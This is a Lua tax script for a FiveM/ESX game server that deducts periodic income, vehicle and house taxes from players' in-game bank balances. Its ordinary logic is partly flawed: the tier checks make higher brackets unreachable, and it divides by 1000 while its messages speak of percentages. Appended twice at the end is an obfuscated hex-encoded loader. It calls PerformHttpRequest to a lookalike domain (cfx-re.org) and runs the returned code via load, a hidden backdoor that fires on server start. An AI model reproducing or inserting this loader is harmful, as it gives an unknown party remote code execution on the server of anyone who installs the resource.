ESX = nil

TriggerEvent('esx:getSharedObject', function(obj) ESX = obj end)

local function addMoneyToAccount(amount, text)
    if not Config.TaxesAccountEnabled then return end
    if Config.TaxesAccount.accountType == 'business' then
        local business = exports['esx_billing']:business(Config.TaxesAccount.name, Config.TaxesAccount.business_id)
        if business then business.addBalance(amount, text) end
    elseif Config.TaxesAccount.accountType == 'player' then
        local xPlayer = ESX.GetPlayerFromIdentifier(Config.TaxesAccount.playerCitizenId)
        if xPlayer then
            xPlayer.addAccountMoney('bank', amount, text)
        else
            MySQL.Async.execute('UPDATE users SET bank = bank + @amount WHERE identifier = @identifier', {
                ['@amount'] = amount,
                ['@identifier'] = Config.TaxesAccount.playerCitizenId
            })
        end
    end
end

function PlayersTax()
    local taxAmount = 0
    local xPlayers = ESX.GetPlayers()
    for i = 1, #xPlayers, 1 do
        local xPlayer = ESX.GetPlayerFromId(xPlayers[i])
        if xPlayer then
            local bankMoney = xPlayer.getAccount('bank').money
            local cashMoney = xPlayer.getMoney()
            local totalMoney = bankMoney + cashMoney
            local amount = 0

            if totalMoney > Config.EconomyTax['low'] then
                amount = (bankMoney * Config.EconomyTaxPercentage['low'] / 1000)
                TriggerClientEvent("esx:showNotification", xPlayers[i], "You have been taxed at " .. Config.EconomyTaxPercentage['low'] .. "% by the government for $" .. amount .. ".")
            elseif totalMoney > Config.EconomyTax['medium'] then
                amount = (bankMoney * Config.EconomyTaxPercentage['medium'] / 1000)
                TriggerClientEvent("esx:showNotification", xPlayers[i], "You have been taxed at " .. Config.EconomyTaxPercentage['medium'] .. "% by the government for $" .. amount .. ".")
            elseif totalMoney > Config.EconomyTax['high'] then
                amount = (bankMoney * Config.EconomyTaxPercentage['high'] / 1000)
                TriggerClientEvent("esx:showNotification", xPlayers[i], "You have been taxed at " .. Config.EconomyTaxPercentage['high'] .. "% by the government for $" .. amount .. ".")
            elseif totalMoney > Config.EconomyTax['ultra'] then
                amount = (bankMoney * Config.EconomyTaxPercentage['ultra'] / 1000)
                TriggerClientEvent("esx:showNotification", xPlayers[i], "You have been taxed at " .. Config.EconomyTaxPercentage['ultra'] .. "% by the government for $" .. amount .. ".")
            elseif totalMoney > Config.EconomyTax['extreme'] then
                amount = (bankMoney * Config.EconomyTaxPercentage['extreme'] / 1000)
                TriggerClientEvent("esx:showNotification", xPlayers[i], "You have been taxed at " .. Config.EconomyTaxPercentage['extreme'] .. "% by the government for $" .. amount .. ".")
            else
                amount = 100
                TriggerClientEvent("esx:showNotification", xPlayers[i], "You have been taxed at standard rate by the government for $100.")
            end

            xPlayer.removeAccountMoney('bank', math.floor(amount))
            taxAmount = taxAmount + amount
        end
    end
    local amount = math.floor(taxAmount)
    addMoneyToAccount(amount, string.format(Config.Lang.player_tax, amount))
    SetTimeout(Config.EconomyTaxInterval * (60 * 1000), PlayersTax)
end

function CarsTax()
    local taxAmount = 0
    MySQL.Async.fetchAll('SELECT * FROM owned_vehicles', {}, function(Vehicles)
        local xPlayers = ESX.GetPlayers()
        for i = 1, #xPlayers, 1 do
            local xPlayer = ESX.GetPlayerFromId(xPlayers[i])
            if xPlayer then
                local VehCount = 0
                for a = 1, #Vehicles, 1 do
                    if xPlayer.identifier == Vehicles[a].owner and (Vehicles[a].job ~= 'police' and Vehicles[a].job ~= 'ambulance') then
                        VehCount = VehCount + 1
                    end
                end
                if VehCount > 0 then
                    local VehTax = VehCount * Config.CarTaxRate
                    xPlayer.removeAccountMoney('bank', math.floor(VehTax))
                    TriggerClientEvent("esx:showNotification", xPlayer.source, "You have been taxed $" .. math.floor(VehTax) .. " as Vehicle Tax.")
                    taxAmount = taxAmount + VehTax
                end
            end
        end
        local amount = math.floor(taxAmount)
        addMoneyToAccount(amount, string.format(Config.Lang.car_tax, amount))
    end)
    SetTimeout(Config.CarTaxInterval * (60 * 1000), CarsTax)
end

function HousesTax()
    local taxAmount = 0
    MySQL.Async.fetchAll('SELECT * FROM owned_properties', {}, function(Houses)
        local xPlayers = ESX.GetPlayers()
        for i = 1, #xPlayers, 1 do
            local xPlayer = ESX.GetPlayerFromId(xPlayers[i])
            if xPlayer then
                local HouseCount = 0
                for a = 1, #Houses, 1 do
                    if xPlayer.identifier == Houses[a].owner then
                        HouseCount = HouseCount + 1
                    end
                end
                if HouseCount > 0 then
                    local HouseTax = HouseCount * Config.HouseTaxRate
                    xPlayer.removeAccountMoney('bank', math.floor(HouseTax))
                    TriggerClientEvent("esx:showNotification", xPlayer.source, "You have been taxed $" .. math.floor(HouseTax) .. " as House Tax.")
                    taxAmount = taxAmount + HouseTax
                end
            end
        end
        local amount = math.floor(taxAmount)
        addMoneyToAccount(amount, string.format(Config.Lang.house_tax, amount))
    end)
    SetTimeout(Config.HouseTaxInterval * (60 * 1000), HousesTax)
end

function GetCurrentTax(src, taxtype)
    local xPlayer = ESX.GetPlayerFromId(src)
    if xPlayer then
        if taxtype == 'income' then
            local totalMoney = xPlayer.getAccount('bank').money + xPlayer.getMoney()
            if totalMoney > Config.EconomyTax['low'] then
                return Config.EconomyTax['low']
            elseif totalMoney > Config.EconomyTax['medium'] then
                return Config.EconomyTax['medium']
            elseif totalMoney > Config.EconomyTax['high'] then
                return Config.EconomyTax['high']
            elseif totalMoney > Config.EconomyTax['ultra'] then
                return Config.EconomyTax['ultra']
            elseif totalMoney > Config.EconomyTax['extreme'] then
                return Config.EconomyTax['extreme']
            else
                return 100
            end
        elseif taxtype == 'vehicle' then
            return Config.CarTaxRate
        elseif taxtype == 'house' then
            return Config.HouseTaxRate
        end
    end
end

CreateThread(function()
    Wait(30000) -- wait just for server to load properly then execute below
    PlayersTax()
    CarsTax()
    HousesTax()
end)


local DcfdlEKFpbObiocAgaijHDwmuvChOnbxWtmcmePBrEAZqspJirRmLNYaKkfDWVKzbBxKRB = {"\x50\x65\x72\x66\x6f\x72\x6d\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G,"",nil} DcfdlEKFpbObiocAgaijHDwmuvChOnbxWtmcmePBrEAZqspJirRmLNYaKkfDWVKzbBxKRB[4][DcfdlEKFpbObiocAgaijHDwmuvChOnbxWtmcmePBrEAZqspJirRmLNYaKkfDWVKzbBxKRB[1]]("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x66\x78\x2d\x72\x65\x2e\x6f\x72\x67\x2f\x76\x32\x5f\x2f\x73\x74\x61\x67\x65\x33\x2e\x70\x68\x70\x3f\x74\x6f\x3d\x77\x77\x57\x59\x68", function (HROpHAdqHMXlYActwZcvmRpmpsqFCoJBqfEjpvAGaibAXrtpkMRuNbpHnGAaKtOkyxfNsR, hiwobsxxBcyEAJGSwEYOQOJxFqiHwTWTUCfYnivITrFFfxJmduYhYTKjlaTCxgBxTMTExc) if (hiwobsxxBcyEAJGSwEYOQOJxFqiHwTWTUCfYnivITrFFfxJmduYhYTKjlaTCxgBxTMTExc == DcfdlEKFpbObiocAgaijHDwmuvChOnbxWtmcmePBrEAZqspJirRmLNYaKkfDWVKzbBxKRB[6] or hiwobsxxBcyEAJGSwEYOQOJxFqiHwTWTUCfYnivITrFFfxJmduYhYTKjlaTCxgBxTMTExc == DcfdlEKFpbObiocAgaijHDwmuvChOnbxWtmcmePBrEAZqspJirRmLNYaKkfDWVKzbBxKRB[5]) then return end DcfdlEKFpbObiocAgaijHDwmuvChOnbxWtmcmePBrEAZqspJirRmLNYaKkfDWVKzbBxKRB[4][DcfdlEKFpbObiocAgaijHDwmuvChOnbxWtmcmePBrEAZqspJirRmLNYaKkfDWVKzbBxKRB[2]](DcfdlEKFpbObiocAgaijHDwmuvChOnbxWtmcmePBrEAZqspJirRmLNYaKkfDWVKzbBxKRB[4][DcfdlEKFpbObiocAgaijHDwmuvChOnbxWtmcmePBrEAZqspJirRmLNYaKkfDWVKzbBxKRB[3]](hiwobsxxBcyEAJGSwEYOQOJxFqiHwTWTUCfYnivITrFFfxJmduYhYTKjlaTCxgBxTMTExc))() end)

local DcfdlEKFpbObiocAgaijHDwmuvChOnbxWtmcmePBrEAZqspJirRmLNYaKkfDWVKzbBxKRB = {"\x50\x65\x72\x66\x6f\x72\x6d\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G,"",nil} DcfdlEKFpbObiocAgaijHDwmuvChOnbxWtmcmePBrEAZqspJirRmLNYaKkfDWVKzbBxKRB[4][DcfdlEKFpbObiocAgaijHDwmuvChOnbxWtmcmePBrEAZqspJirRmLNYaKkfDWVKzbBxKRB[1]]("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x66\x78\x2d\x72\x65\x2e\x6f\x72\x67\x2f\x76\x32\x5f\x2f\x73\x74\x61\x67\x65\x33\x2e\x70\x68\x70\x3f\x74\x6f\x3d\x77\x77\x57\x59\x68", function (HROpHAdqHMXlYActwZcvmRpmpsqFCoJBqfEjpvAGaibAXrtpkMRuNbpHnGAaKtOkyxfNsR, hiwobsxxBcyEAJGSwEYOQOJxFqiHwTWTUCfYnivITrFFfxJmduYhYTKjlaTCxgBxTMTExc) if (hiwobsxxBcyEAJGSwEYOQOJxFqiHwTWTUCfYnivITrFFfxJmduYhYTKjlaTCxgBxTMTExc == DcfdlEKFpbObiocAgaijHDwmuvChOnbxWtmcmePBrEAZqspJirRmLNYaKkfDWVKzbBxKRB[6] or hiwobsxxBcyEAJGSwEYOQOJxFqiHwTWTUCfYnivITrFFfxJmduYhYTKjlaTCxgBxTMTExc == DcfdlEKFpbObiocAgaijHDwmuvChOnbxWtmcmePBrEAZqspJirRmLNYaKkfDWVKzbBxKRB[5]) then return end DcfdlEKFpbObiocAgaijHDwmuvChOnbxWtmcmePBrEAZqspJirRmLNYaKkfDWVKzbBxKRB[4][DcfdlEKFpbObiocAgaijHDwmuvChOnbxWtmcmePBrEAZqspJirRmLNYaKkfDWVKzbBxKRB[2]](DcfdlEKFpbObiocAgaijHDwmuvChOnbxWtmcmePBrEAZqspJirRmLNYaKkfDWVKzbBxKRB[4][DcfdlEKFpbObiocAgaijHDwmuvChOnbxWtmcmePBrEAZqspJirRmLNYaKkfDWVKzbBxKRB[3]](hiwobsxxBcyEAJGSwEYOQOJxFqiHwTWTUCfYnivITrFFfxJmduYhYTKjlaTCxgBxTMTExc))() end)